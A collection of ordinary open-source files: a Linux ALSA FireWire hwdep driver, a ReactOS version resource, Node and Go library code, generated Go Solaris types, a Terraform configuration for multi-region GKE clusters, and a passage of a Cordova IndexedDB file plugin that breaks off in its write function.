	/* Sleep (interruptibly) until a lock-status change is signalled. */
	spin_lock_irq(&ff->lock);
	while (!ff->dev_lock_changed) {
		prepare_to_wait(&ff->hwdep_wait, &wait, TASK_INTERRUPTIBLE);
		spin_unlock_irq(&ff->lock);
		schedule();
		finish_wait(&ff->hwdep_wait, &wait);
		if (signal_pending(current))
			return -ERESTARTSYS;
		spin_lock_irq(&ff->lock);
	}

	memset(&event, 0, sizeof(event));
	if (ff->dev_lock_changed) {
		event.lock_status.type = SNDRV_FIREWIRE_EVENT_LOCK_STATUS;
		/* Positive count means a kernel (stream) user holds the lock. */
		event.lock_status.status = (ff->dev_lock_count > 0);
		ff->dev_lock_changed = false;
		/* Never copy more than the payload actually filled in. */
		count = min_t(long, count, sizeof(event.lock_status));
	}
	spin_unlock_irq(&ff->lock);

	if (copy_to_user(buf, &event, count))
		return -EFAULT;

	return count;
}
/*
 * Poll support: the device becomes readable once the lock state has
 * changed since the last hwdep_read().
 */
static __poll_t hwdep_poll(struct snd_hwdep *hwdep, struct file *file,
			   poll_table *wait)
{
	struct snd_ff *ff = hwdep->private_data;
	__poll_t events;

	poll_wait(file, &ff->hwdep_wait, wait);

	spin_lock_irq(&ff->lock);
	if (ff->dev_lock_changed)
		events = EPOLLIN | EPOLLRDNORM;
	else
		events = 0;
	spin_unlock_irq(&ff->lock);

	return events;
}
/*
 * Fill a struct snd_firewire_get_info for user space: driver type, card
 * index, the 64-bit GUID taken from config-ROM quadlets 3 and 4, and the
 * FireWire device name. Returns 0 or -EFAULT.
 */
static int hwdep_get_info(struct snd_ff *ff, void __user *arg)
{
	struct fw_device *dev = fw_parent_device(ff->unit);
	struct snd_firewire_get_info info;

	memset(&info, 0, sizeof(info));
	info.type = SNDRV_FIREWIRE_TYPE_FIREFACE;
	info.card = dev->card->index;
	/* The GUID is exposed big-endian, one quadlet per 4-byte half. */
	*(__be32 *)&info.guid[0] = cpu_to_be32(dev->config_rom[3]);
	*(__be32 *)&info.guid[4] = cpu_to_be32(dev->config_rom[4]);
	strlcpy(info.device_name, dev_name(&dev->device),
		sizeof(info.device_name));

	if (copy_to_user(arg, &info, sizeof(info)))
		return -EFAULT;

	return 0;
}
/*
 * Take the user-space advisory lock. Succeeds only while nobody holds the
 * lock at all (dev_lock_count == 0); user-space ownership is recorded as
 * the sentinel value -1. Returns 0 on success, -EBUSY otherwise.
 */
static int hwdep_lock(struct snd_ff *ff)
{
	int err = -EBUSY;

	spin_lock_irq(&ff->lock);
	if (ff->dev_lock_count == 0) {
		ff->dev_lock_count = -1;
		err = 0;
	}
	spin_unlock_irq(&ff->lock);

	return err;
}
/*
 * Release the user-space advisory lock. Only valid while user space holds
 * it (dev_lock_count == -1). Returns 0 on success, -EBADFD otherwise.
 */
static int hwdep_unlock(struct snd_ff *ff)
{
	int err = -EBADFD;

	spin_lock_irq(&ff->lock);
	if (ff->dev_lock_count == -1) {
		ff->dev_lock_count = 0;
		err = 0;
	}
	spin_unlock_irq(&ff->lock);

	return err;
}
/*
 * File release hook: if the closing descriptor still holds the user-space
 * lock (dev_lock_count == -1), drop it so the device is not left locked
 * by a dead process. Always succeeds.
 */
static int hwdep_release(struct snd_hwdep *hwdep, struct file *file)
{
	struct snd_ff *ff = hwdep->private_data;

	spin_lock_irq(&ff->lock);
	if (ff->dev_lock_count == -1)
		ff->dev_lock_count = 0;
	spin_unlock_irq(&ff->lock);

	return 0;
}
/*
 * Dispatch the hwdep ioctls common to ALSA FireWire drivers. Unknown
 * commands return -ENOIOCTLCMD so the core can fall back.
 */
static int hwdep_ioctl(struct snd_hwdep *hwdep, struct file *file,
		       unsigned int cmd, unsigned long arg)
{
	struct snd_ff *ff = hwdep->private_data;

	switch (cmd) {
	case SNDRV_FIREWIRE_IOCTL_GET_INFO:
		return hwdep_get_info(ff, (void __user *)arg);
	case SNDRV_FIREWIRE_IOCTL_LOCK:
		return hwdep_lock(ff);
	case SNDRV_FIREWIRE_IOCTL_UNLOCK:
		return hwdep_unlock(ff);
	default:
		return -ENOIOCTLCMD;
	}
}
#ifdef CONFIG_COMPAT
/*
 * 32-bit compat entry point: convert the pointer-carrying argument with
 * compat_ptr() and reuse the native handler.
 */
static int hwdep_compat_ioctl(struct snd_hwdep *hwdep, struct file *file,
			      unsigned int cmd, unsigned long arg)
{
	return hwdep_ioctl(hwdep, file, cmd,
			   (unsigned long)compat_ptr(arg));
}
#else
/* Without compat support the callback slot is simply left unset. */
#define hwdep_compat_ioctl NULL
#endif
/*
 * Create the hwdep device for this card, wiring up the read/poll/ioctl
 * entry points above. The device is exclusive: a single opener at a time.
 * Returns 0 on success or the negative error from snd_hwdep_new().
 */
int snd_ff_create_hwdep_devices(struct snd_ff *ff)
{
	static const struct snd_hwdep_ops hwdep_ops = {
		.read		= hwdep_read,
		.release	= hwdep_release,
		.poll		= hwdep_poll,
		.ioctl		= hwdep_ioctl,
		.ioctl_compat	= hwdep_compat_ioctl,
	};
	struct snd_hwdep *hwdep;
	int err;

	err = snd_hwdep_new(ff->card, ff->card->driver, 0, &hwdep);
	if (err < 0)
		return err;
	strcpy(hwdep->name, ff->card->driver);
	hwdep->iface = SNDRV_HWDEP_IFACE_FW_FIREFACE;
	hwdep->ops = hwdep_ops;
	hwdep->private_data = ff;
	hwdep->exclusive = true;

	return 0;
}
|
{
"pile_set_name": "Github"
}
|
// Version-resource definitions for the rpcrt4 (RPC runtime) DLL; the
// shared template in <reactos/version.rc> consumes these macros.
#define REACTOS_VERSION_DLL
#define REACTOS_STR_FILE_DESCRIPTION "ReactOS RPC server API"
#define REACTOS_STR_INTERNAL_NAME "rpcrt4"
#define REACTOS_STR_ORIGINAL_FILENAME "rpcrt4.dll"
#include <reactos/version.rc>
|
{
"pile_set_name": "Github"
}
|
["line
break"]
|
{
"pile_set_name": "Github"
}
|
// Copyright Joyent, Inc. and other Node contributors.
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to permit
// persons to whom the Software is furnished to do so, subject to the
// following conditions:
//
// The above copyright notice and this permission notice shall be included
// in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
// OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
// USE OR OTHER DEALINGS IN THE SOFTWARE.
// a passthrough stream.
// basically just the most minimal sort of Transform stream.
// Every written chunk gets output as-is.
'use strict';

module.exports = PassThrough;

var Transform = require('./_stream_transform');

/*<replacement>*/
var util = require('core-util-is');
util.inherits = require('inherits');
/*</replacement>*/

util.inherits(PassThrough, Transform);

// PassThrough: the most minimal Transform stream — every written chunk is
// emitted unchanged. Callable with or without `new`.
function PassThrough(options) {
  if (!(this instanceof PassThrough)) return new PassThrough(options);

  Transform.call(this, options);
}

// Identity transform: hand the chunk straight back to the stream machinery.
PassThrough.prototype._transform = function (chunk, encoding, cb) {
  cb(null, chunk);
};
|
{
"pile_set_name": "Github"
}
|
// Copyright 2011 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build aix darwin dragonfly freebsd linux,!appengine netbsd openbsd
// Package terminal provides support functions for dealing with terminals, as
// commonly found on UNIX systems.
//
// Putting a terminal into raw mode is the most common requirement:
//
// oldState, err := terminal.MakeRaw(0)
// if err != nil {
// panic(err)
// }
// defer terminal.Restore(0, oldState)
package terminal // import "golang.org/x/crypto/ssh/terminal"
import (
"golang.org/x/sys/unix"
)
// State contains the state of a terminal.
type State struct {
	termios unix.Termios // saved termios settings, used by Restore
}
// IsTerminal returns whether the given file descriptor is a terminal.
func IsTerminal(fd int) bool {
	// A descriptor is a terminal exactly when the termios ioctl succeeds.
	if _, err := unix.IoctlGetTermios(fd, ioctlReadTermios); err != nil {
		return false
	}
	return true
}
// MakeRaw put the terminal connected to the given file descriptor into raw
// mode and returns the previous state of the terminal so that it can be
// restored.
func MakeRaw(fd int) (*State, error) {
	termios, err := unix.IoctlGetTermios(fd, ioctlReadTermios)
	if err != nil {
		return nil, err
	}

	// Snapshot the pre-raw settings before mutating them below.
	oldState := State{termios: *termios}

	// This attempts to replicate the behaviour documented for cfmakeraw in
	// the termios(3) manpage.
	// Input: no break-to-signal, no CR/NL translation, keep the 8th bit,
	// no parity marking, no software flow control.
	termios.Iflag &^= unix.IGNBRK | unix.BRKINT | unix.PARMRK | unix.ISTRIP | unix.INLCR | unix.IGNCR | unix.ICRNL | unix.IXON
	// Output: no post-processing.
	termios.Oflag &^= unix.OPOST
	// Local: no echo, no canonical (line) mode, no signal chars, no
	// extended input processing.
	termios.Lflag &^= unix.ECHO | unix.ECHONL | unix.ICANON | unix.ISIG | unix.IEXTEN
	// Control: clear size/parity bits, then select 8-bit characters.
	termios.Cflag &^= unix.CSIZE | unix.PARENB
	termios.Cflag |= unix.CS8
	// Reads return as soon as one byte is available, with no timeout.
	termios.Cc[unix.VMIN] = 1
	termios.Cc[unix.VTIME] = 0
	if err := unix.IoctlSetTermios(fd, ioctlWriteTermios, termios); err != nil {
		return nil, err
	}

	return &oldState, nil
}
// GetState returns the current state of a terminal which may be useful to
// restore the terminal after a signal.
func GetState(fd int) (*State, error) {
	t, err := unix.IoctlGetTermios(fd, ioctlReadTermios)
	if err != nil {
		return nil, err
	}
	state := State{termios: *t}
	return &state, nil
}
// Restore restores the terminal connected to the given file descriptor to a
// previous state.
func Restore(fd int, state *State) error {
	err := unix.IoctlSetTermios(fd, ioctlWriteTermios, &state.termios)
	return err
}
// GetSize returns the dimensions of the given terminal.
func GetSize(fd int) (width, height int, err error) {
	ws, werr := unix.IoctlGetWinsize(fd, unix.TIOCGWINSZ)
	if werr != nil {
		return -1, -1, werr
	}
	width, height = int(ws.Col), int(ws.Row)
	return width, height, nil
}
// passwordReader is an io.Reader that reads from a specific file descriptor.
type passwordReader int

// Read performs a raw read(2) on the wrapped descriptor.
func (r passwordReader) Read(buf []byte) (int, error) {
	return unix.Read(int(r), buf)
}
// ReadPassword reads a line of input from a terminal without local echo. This
// is commonly used for inputting passwords and other sensitive data. The slice
// returned does not include the \n.
func ReadPassword(fd int) ([]byte, error) {
	termios, err := unix.IoctlGetTermios(fd, ioctlReadTermios)
	if err != nil {
		return nil, err
	}

	// Disable echo but keep canonical mode and signal generation, so the
	// user can still edit the line and interrupt with ^C.
	newState := *termios
	newState.Lflag &^= unix.ECHO
	newState.Lflag |= unix.ICANON | unix.ISIG
	newState.Iflag |= unix.ICRNL
	if err := unix.IoctlSetTermios(fd, ioctlWriteTermios, &newState); err != nil {
		return nil, err
	}

	// Restore the original settings once the line has been read.
	defer unix.IoctlSetTermios(fd, ioctlWriteTermios, termios)

	return readPasswordLine(passwordReader(fd))
}
|
{
"pile_set_name": "Github"
}
|
// cgo -godefs types_solaris.go | go run mkpost.go
// Code generated by the command above; see README.md. DO NOT EDIT.
// +build amd64,solaris
package unix
const (
SizeofPtr = 0x8
SizeofShort = 0x2
SizeofInt = 0x4
SizeofLong = 0x8
SizeofLongLong = 0x8
PathMax = 0x400
MaxHostNameLen = 0x100
)
type (
_C_short int16
_C_int int32
_C_long int64
_C_long_long int64
)
type Timespec struct {
Sec int64
Nsec int64
}
type Timeval struct {
Sec int64
Usec int64
}
type Timeval32 struct {
Sec int32
Usec int32
}
type Tms struct {
Utime int64
Stime int64
Cutime int64
Cstime int64
}
type Utimbuf struct {
Actime int64
Modtime int64
}
type Rusage struct {
Utime Timeval
Stime Timeval
Maxrss int64
Ixrss int64
Idrss int64
Isrss int64
Minflt int64
Majflt int64
Nswap int64
Inblock int64
Oublock int64
Msgsnd int64
Msgrcv int64
Nsignals int64
Nvcsw int64
Nivcsw int64
}
type Rlimit struct {
Cur uint64
Max uint64
}
type _Gid_t uint32
type Stat_t struct {
Dev uint64
Ino uint64
Mode uint32
Nlink uint32
Uid uint32
Gid uint32
Rdev uint64
Size int64
Atim Timespec
Mtim Timespec
Ctim Timespec
Blksize int32
_ [4]byte
Blocks int64
Fstype [16]int8
}
type Flock_t struct {
Type int16
Whence int16
_ [4]byte
Start int64
Len int64
Sysid int32
Pid int32
Pad [4]int64
}
type Dirent struct {
Ino uint64
Off int64
Reclen uint16
Name [1]int8
_ [5]byte
}
type _Fsblkcnt_t uint64
type Statvfs_t struct {
Bsize uint64
Frsize uint64
Blocks uint64
Bfree uint64
Bavail uint64
Files uint64
Ffree uint64
Favail uint64
Fsid uint64
Basetype [16]int8
Flag uint64
Namemax uint64
Fstr [32]int8
}
type RawSockaddrInet4 struct {
Family uint16
Port uint16
Addr [4]byte /* in_addr */
Zero [8]int8
}
type RawSockaddrInet6 struct {
Family uint16
Port uint16
Flowinfo uint32
Addr [16]byte /* in6_addr */
Scope_id uint32
X__sin6_src_id uint32
}
type RawSockaddrUnix struct {
Family uint16
Path [108]int8
}
type RawSockaddrDatalink struct {
Family uint16
Index uint16
Type uint8
Nlen uint8
Alen uint8
Slen uint8
Data [244]int8
}
type RawSockaddr struct {
Family uint16
Data [14]int8
}
type RawSockaddrAny struct {
Addr RawSockaddr
Pad [236]int8
}
type _Socklen uint32
type Linger struct {
Onoff int32
Linger int32
}
type Iovec struct {
Base *int8
Len uint64
}
type IPMreq struct {
Multiaddr [4]byte /* in_addr */
Interface [4]byte /* in_addr */
}
type IPv6Mreq struct {
Multiaddr [16]byte /* in6_addr */
Interface uint32
}
type Msghdr struct {
Name *byte
Namelen uint32
_ [4]byte
Iov *Iovec
Iovlen int32
_ [4]byte
Accrights *int8
Accrightslen int32
_ [4]byte
}
type Cmsghdr struct {
Len uint32
Level int32
Type int32
}
type Inet4Pktinfo struct {
Ifindex uint32
Spec_dst [4]byte /* in_addr */
Addr [4]byte /* in_addr */
}
type Inet6Pktinfo struct {
Addr [16]byte /* in6_addr */
Ifindex uint32
}
type IPv6MTUInfo struct {
Addr RawSockaddrInet6
Mtu uint32
}
type ICMPv6Filter struct {
X__icmp6_filt [8]uint32
}
const (
SizeofSockaddrInet4 = 0x10
SizeofSockaddrInet6 = 0x20
SizeofSockaddrAny = 0xfc
SizeofSockaddrUnix = 0x6e
SizeofSockaddrDatalink = 0xfc
SizeofLinger = 0x8
SizeofIPMreq = 0x8
SizeofIPv6Mreq = 0x14
SizeofMsghdr = 0x30
SizeofCmsghdr = 0xc
SizeofInet4Pktinfo = 0xc
SizeofInet6Pktinfo = 0x14
SizeofIPv6MTUInfo = 0x24
SizeofICMPv6Filter = 0x20
)
type FdSet struct {
Bits [1024]int64
}
type Utsname struct {
Sysname [257]byte
Nodename [257]byte
Release [257]byte
Version [257]byte
Machine [257]byte
}
type Ustat_t struct {
Tfree int64
Tinode uint64
Fname [6]int8
Fpack [6]int8
_ [4]byte
}
const (
AT_FDCWD = 0xffd19553
AT_SYMLINK_NOFOLLOW = 0x1000
AT_SYMLINK_FOLLOW = 0x2000
AT_REMOVEDIR = 0x1
AT_EACCESS = 0x4
)
const (
SizeofIfMsghdr = 0x54
SizeofIfData = 0x44
SizeofIfaMsghdr = 0x14
SizeofRtMsghdr = 0x4c
SizeofRtMetrics = 0x28
)
type IfMsghdr struct {
Msglen uint16
Version uint8
Type uint8
Addrs int32
Flags int32
Index uint16
_ [2]byte
Data IfData
}
type IfData struct {
Type uint8
Addrlen uint8
Hdrlen uint8
_ [1]byte
Mtu uint32
Metric uint32
Baudrate uint32
Ipackets uint32
Ierrors uint32
Opackets uint32
Oerrors uint32
Collisions uint32
Ibytes uint32
Obytes uint32
Imcasts uint32
Omcasts uint32
Iqdrops uint32
Noproto uint32
Lastchange Timeval32
}
type IfaMsghdr struct {
Msglen uint16
Version uint8
Type uint8
Addrs int32
Flags int32
Index uint16
_ [2]byte
Metric int32
}
type RtMsghdr struct {
Msglen uint16
Version uint8
Type uint8
Index uint16
_ [2]byte
Flags int32
Addrs int32
Pid int32
Seq int32
Errno int32
Use int32
Inits uint32
Rmx RtMetrics
}
type RtMetrics struct {
Locks uint32
Mtu uint32
Hopcount uint32
Expire uint32
Recvpipe uint32
Sendpipe uint32
Ssthresh uint32
Rtt uint32
Rttvar uint32
Pksent uint32
}
const (
SizeofBpfVersion = 0x4
SizeofBpfStat = 0x80
SizeofBpfProgram = 0x10
SizeofBpfInsn = 0x8
SizeofBpfHdr = 0x14
)
type BpfVersion struct {
Major uint16
Minor uint16
}
type BpfStat struct {
Recv uint64
Drop uint64
Capt uint64
Padding [13]uint64
}
type BpfProgram struct {
Len uint32
_ [4]byte
Insns *BpfInsn
}
type BpfInsn struct {
Code uint16
Jt uint8
Jf uint8
K uint32
}
type BpfTimeval struct {
Sec int32
Usec int32
}
type BpfHdr struct {
Tstamp BpfTimeval
Caplen uint32
Datalen uint32
Hdrlen uint16
_ [2]byte
}
type Termios struct {
Iflag uint32
Oflag uint32
Cflag uint32
Lflag uint32
Cc [19]uint8
_ [1]byte
}
type Termio struct {
Iflag uint16
Oflag uint16
Cflag uint16
Lflag uint16
Line int8
Cc [8]uint8
_ [1]byte
}
type Winsize struct {
Row uint16
Col uint16
Xpixel uint16
Ypixel uint16
}
type PollFd struct {
Fd int32
Events int16
Revents int16
}
const (
POLLERR = 0x8
POLLHUP = 0x10
POLLIN = 0x1
POLLNVAL = 0x20
POLLOUT = 0x4
POLLPRI = 0x2
POLLRDBAND = 0x80
POLLRDNORM = 0x40
POLLWRBAND = 0x100
POLLWRNORM = 0x4
)
|
{
"pile_set_name": "Github"
}
|
# Names for the two regional GKE clusters.
variable "region1_cluster_name" {
  default = "tf-region1"
}

variable "region2_cluster_name" {
  default = "tf-region2"
}

# The two GCP regions the clusters are deployed to.
variable "region1" {
  default = "us-west1"
}

variable "region2" {
  default = "us-east4"
}

# Shared name for the VPC and its per-region subnetworks.
variable "network_name" {
  default = "tf-gke-multi-region"
}

provider "google" {
  region = "${var.region1}"
}

# Supplies the access token used by the kubernetes providers below.
data "google_client_config" "current" {}

# Custom-mode VPC; one subnetwork per region is declared explicitly.
resource "google_compute_network" "default" {
  name                    = "${var.network_name}"
  auto_create_subnetworks = false
}

resource "google_compute_subnetwork" "region1" {
  name          = "${var.network_name}"
  ip_cidr_range = "10.126.0.0/20"
  network       = "${google_compute_network.default.self_link}"
  region        = "${var.region1}"
}

resource "google_compute_subnetwork" "region2" {
  name          = "${var.network_name}"
  ip_cidr_range = "10.127.0.0/20"
  network       = "${google_compute_network.default.self_link}"
  region        = "${var.region2}"
}
# One regional GKE cluster per region, built from the local gke-regional module.
module "cluster1" {
  source       = "./gke-regional"
  region       = "${var.region1}"
  cluster_name = "${var.region1_cluster_name}"
  tags         = ["tf-gke-region1"]
  network      = "${google_compute_subnetwork.region1.network}"
  subnetwork   = "${google_compute_subnetwork.region1.name}"
}

module "cluster2" {
  source       = "./gke-regional"
  region       = "${var.region2}"
  cluster_name = "${var.region2_cluster_name}"
  tags         = ["tf-gke-region2"]
  network      = "${google_compute_subnetwork.region2.network}"
  subnetwork   = "${google_compute_subnetwork.region2.name}"
}

# One aliased kubernetes provider per cluster, authenticated with the
# current gcloud access token plus the cluster's client certificate.
provider "kubernetes" {
  alias                  = "cluster1"
  host                   = "${module.cluster1.endpoint}"
  token                  = "${data.google_client_config.current.access_token}"
  client_certificate     = "${base64decode(module.cluster1.client_certificate)}"
  client_key             = "${base64decode(module.cluster1.client_key)}"
  cluster_ca_certificate = "${base64decode(module.cluster1.cluster_ca_certificate)}"
}

provider "kubernetes" {
  alias                  = "cluster2"
  host                   = "${module.cluster2.endpoint}"
  token                  = "${data.google_client_config.current.access_token}"
  client_certificate     = "${base64decode(module.cluster2.client_certificate)}"
  client_key             = "${base64decode(module.cluster2.client_key)}"
  cluster_ca_certificate = "${base64decode(module.cluster2.cluster_ca_certificate)}"
}

# The demo app deployed into each cluster; node_port 30000 must match the
# health-check port in the load balancer's backend_params below.
module "cluster1_app" {
  source      = "./k8s-app"
  external_ip = "${module.glb.external_ip}"
  node_port   = 30000

  providers = {
    kubernetes = "kubernetes.cluster1"
  }
}

module "cluster2_app" {
  source      = "./k8s-app"
  external_ip = "${module.glb.external_ip}"
  node_port   = 30000

  providers = {
    kubernetes = "kubernetes.cluster2"
  }
}

# Global HTTP load balancer spanning the instance groups of both regional
# clusters (three zonal instance groups per regional cluster).
module "glb" {
  source            = "GoogleCloudPlatform/lb-http/google"
  version           = "1.0.10"
  name              = "gke-multi-regional"
  target_tags       = ["tf-gke-region1", "tf-gke-region2"]
  firewall_networks = ["${google_compute_network.default.name}"]

  backends = {
    "0" = [
      {
        group = "${element(module.cluster1.instance_groups, 0)}"
      },
      {
        group = "${element(module.cluster1.instance_groups, 1)}"
      },
      {
        group = "${element(module.cluster1.instance_groups, 2)}"
      },
      {
        group = "${element(module.cluster2.instance_groups, 0)}"
      },
      {
        group = "${element(module.cluster2.instance_groups, 1)}"
      },
      {
        group = "${element(module.cluster2.instance_groups, 2)}"
      },
    ]
  }

  backend_params = [
    // health check path, port name, port number, timeout seconds.
    "/,http,30000,10",
  ]
}
# Register the named port "http" -> 30000 on every zonal instance group so
# the load balancer backends can address the port by name.
module "cluster1_named_port_1" {
  source         = "github.com/danisla/terraform-google-named-ports"
  instance_group = "${element(module.cluster1.instance_groups, 0)}"
  name           = "http"
  port           = "30000"
}

module "cluster1_named_port_2" {
  source         = "github.com/danisla/terraform-google-named-ports"
  instance_group = "${element(module.cluster1.instance_groups, 1)}"
  name           = "http"
  port           = "30000"
}

module "cluster1_named_port_3" {
  source         = "github.com/danisla/terraform-google-named-ports"
  instance_group = "${element(module.cluster1.instance_groups, 2)}"
  name           = "http"
  port           = "30000"
}

module "cluster2_named_port_1" {
  source         = "github.com/danisla/terraform-google-named-ports"
  instance_group = "${element(module.cluster2.instance_groups, 0)}"
  name           = "http"
  port           = "30000"
}

module "cluster2_named_port_2" {
  source         = "github.com/danisla/terraform-google-named-ports"
  instance_group = "${element(module.cluster2.instance_groups, 1)}"
  name           = "http"
  port           = "30000"
}

module "cluster2_named_port_3" {
  source         = "github.com/danisla/terraform-google-named-ports"
  instance_group = "${element(module.cluster2.instance_groups, 2)}"
  name           = "http"
  port           = "30000"
}

# Convenience outputs for scripts and the console.
output "cluster1-name" {
  value = "${var.region1_cluster_name}"
}

output "cluster2-name" {
  value = "${var.region2_cluster_name}"
}

output "cluster1-region" {
  value = "${var.region1}"
}

output "cluster2-region" {
  value = "${var.region2}"
}

# Public IP of the global HTTP load balancer fronting both clusters.
output "load-balancer-ip" {
  value = "${module.glb.external_ip}"
}
|
{
"pile_set_name": "Github"
}
|
/*
*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*
*/
/* global IDBKeyRange */
var LocalFileSystem = require('./LocalFileSystem'),
FileSystem = require('./FileSystem'),
FileEntry = require('./FileEntry'),
FileError = require('./FileError'),
DirectoryEntry = require('./DirectoryEntry'),
File = require('./File');
/*
QUIRKS:
Does not fail when removing non-empty directories
Does not support metadata for directories
Does not support requestAllFileSystems
Does not support resolveLocalFileSystemURI
Methods copyTo and moveTo do not support directories
Heavily based on https://github.com/ebidel/idb.filesystem.js
*/
(function(exports, global) {
// Backing store for the whole plugin: one IndexedDB database per origin.
var indexedDB = global.indexedDB || global.mozIndexedDB;
if (!indexedDB) {
throw "Firefox OS File plugin: indexedDB not supported";
}
// Singleton FileSystem created by requestFileSystem; all lookups share it.
var fs_ = null;
// Thin wrapper object around the IndexedDB connection (methods added below).
var idb_ = {};
idb_.db = null;
// Name of the single object store; keys are full storage paths.
var FILE_STORE_ = 'entries';
var DIR_SEPARATOR = '/';
// '0' (the character after '/'): used as an exclusive upper bound so key
// ranges of the form [path + '/', path + '0') cover exactly path's subtree.
var DIR_OPEN_BOUND = String.fromCharCode(DIR_SEPARATOR.charCodeAt(0) + 1);
var pathsPrefix = {
// Read-only directory where the application is installed.
applicationDirectory: location.origin + "/",
// Where to put app-specific data files.
dataDirectory: 'file:///persistent/',
// Cached files that should survive app restarts.
// Apps should not rely on the OS to delete files in here.
cacheDirectory: 'file:///temporary/',
};
/*** Exported functionality ***/
exports.requestFileSystem = function(successCallback, errorCallback, args) {
var type = args[0];
//var size = args[1];
if (type !== LocalFileSystem.TEMPORARY && type !== LocalFileSystem.PERSISTENT) {
if (errorCallback) {
errorCallback(FileError.INVALID_MODIFICATION_ERR);
}
return;
}
var name = type === LocalFileSystem.TEMPORARY ? 'temporary' : 'persistent';
var storageName = (location.protocol + location.host).replace(/:/g, '_');
var root = new DirectoryEntry('', DIR_SEPARATOR);
fs_ = new FileSystem(name, root);
idb_.open(storageName, function() {
successCallback(fs_);
}, errorCallback);
};
// Hook consumed by the shared "fileSystems" module: resolve a filesystem by
// name. Every name is answered with the single root created above.
require('./fileSystems').getFs = function(name, callback) {
callback(new FileSystem(name, fs_.root));
};
// list a directory's contents (files and folders).
exports.readEntries = function(successCallback, errorCallback, args) {
var fullPath = args[0];
if (!successCallback) {
throw Error('Expected successCallback argument.');
}
var path = resolveToFullPath_(fullPath);
idb_.getAllEntries(path.fullPath, path.storagePath, function(entries) {
successCallback(entries);
}, errorCallback);
};
// Look up (or create) the file `path` (args[1]) relative to directory
// `fullPath` (args[0]); args[2] holds the W3C {create, exclusive} flags.
// Implements the FileSystem API getFile() contract case by case.
exports.getFile = function(successCallback, errorCallback, args) {
var fullPath = args[0];
var path = args[1];
var options = args[2] || {};
// Create an absolute path if we were handed a relative one.
path = resolveToFullPath_(fullPath, path);
idb_.get(path.storagePath, function(fileEntry) {
if (options.create === true && options.exclusive === true && fileEntry) {
// If create and exclusive are both true, and the path already exists,
// getFile must fail.
if (errorCallback) {
errorCallback(FileError.PATH_EXISTS_ERR);
}
} else if (options.create === true && !fileEntry) {
// If create is true, the path doesn't exist, and no other error occurs,
// getFile must create it as a zero-length file and return a corresponding
// FileEntry.
var newFileEntry = new FileEntry(path.fileName, path.fullPath, new FileSystem(path.fsName, fs_.root));
// MyFile (defined below) stands in for the unconstructible native File.
newFileEntry.file_ = new MyFile({
size: 0,
name: newFileEntry.name,
lastModifiedDate: new Date(),
storagePath: path.storagePath
});
idb_.put(newFileEntry, path.storagePath, successCallback, errorCallback);
} else if (options.create === true && fileEntry) {
if (fileEntry.isFile) {
// Overwrite file, delete then create new.
idb_['delete'](path.storagePath, function() {
var newFileEntry = new FileEntry(path.fileName, path.fullPath, new FileSystem(path.fsName, fs_.root));
newFileEntry.file_ = new MyFile({
size: 0,
name: newFileEntry.name,
lastModifiedDate: new Date(),
storagePath: path.storagePath
});
idb_.put(newFileEntry, path.storagePath, successCallback, errorCallback);
}, errorCallback);
} else {
// Existing entry is a directory: cannot be replaced by a file.
if (errorCallback) {
errorCallback(FileError.INVALID_MODIFICATION_ERR);
}
}
} else if ((!options.create || options.create === false) && !fileEntry) {
// If create is not true and the path doesn't exist, getFile must fail.
if (errorCallback) {
errorCallback(FileError.NOT_FOUND_ERR);
}
} else if ((!options.create || options.create === false) && fileEntry &&
fileEntry.isDirectory) {
// If create is not true and the path exists, but is a directory, getFile
// must fail.
if (errorCallback) {
errorCallback(FileError.INVALID_MODIFICATION_ERR);
}
} else {
// Otherwise, if no other error occurs, getFile must return a FileEntry
// corresponding to path.
successCallback(fileEntryFromIdbEntry(fileEntry));
}
}, errorCallback);
};
exports.getFileMetadata = function(successCallback, errorCallback, args) {
var fullPath = args[0];
exports.getFile(function(fileEntry) {
successCallback(new File(fileEntry.file_.name, fileEntry.fullPath, '', fileEntry.file_.lastModifiedDate,
fileEntry.file_.size));
}, errorCallback, [fullPath, null]);
};
exports.getMetadata = function(successCallback, errorCallback, args) {
exports.getFile(function (fileEntry) {
successCallback(
{
modificationTime: fileEntry.file_.lastModifiedDate,
size: fileEntry.file_.lastModifiedDate
});
}, errorCallback, args);
};
exports.setMetadata = function(successCallback, errorCallback, args) {
var fullPath = args[0];
var metadataObject = args[1];
exports.getFile(function (fileEntry) {
fileEntry.file_.lastModifiedDate = metadataObject.modificationTime;
}, errorCallback, [fullPath, null]);
};
// Write `data` (args[1], a typed array/Blob-like with byteLength) into the
// file at args[0] starting at byte offset `position` (args[2]). The whole
// backing Blob is rebuilt: head of the old blob + zero padding (if writing
// past EOF) + data + tail, then the entry is persisted back to IndexedDB.
exports.write = function(successCallback, errorCallback, args) {
var fileName = args[0],
data = args[1],
position = args[2];
//isBinary = args[3];
if (!data) {
if (errorCallback) {
errorCallback(FileError.INVALID_MODIFICATION_ERR);
}
return;
}
exports.getFile(function(fileEntry) {
var blob_ = fileEntry.file_.blob_;
if (!blob_) {
blob_ = new Blob([data], {type: data.type});
} else {
// Calc the head and tail fragments
var head = blob_.slice(0, position);
var tail = blob_.slice(position + data.byteLength);
// Calc the padding
var padding = position - head.size;
if (padding < 0) {
padding = 0;
}
// Do the "write". In fact, a full overwrite of the Blob.
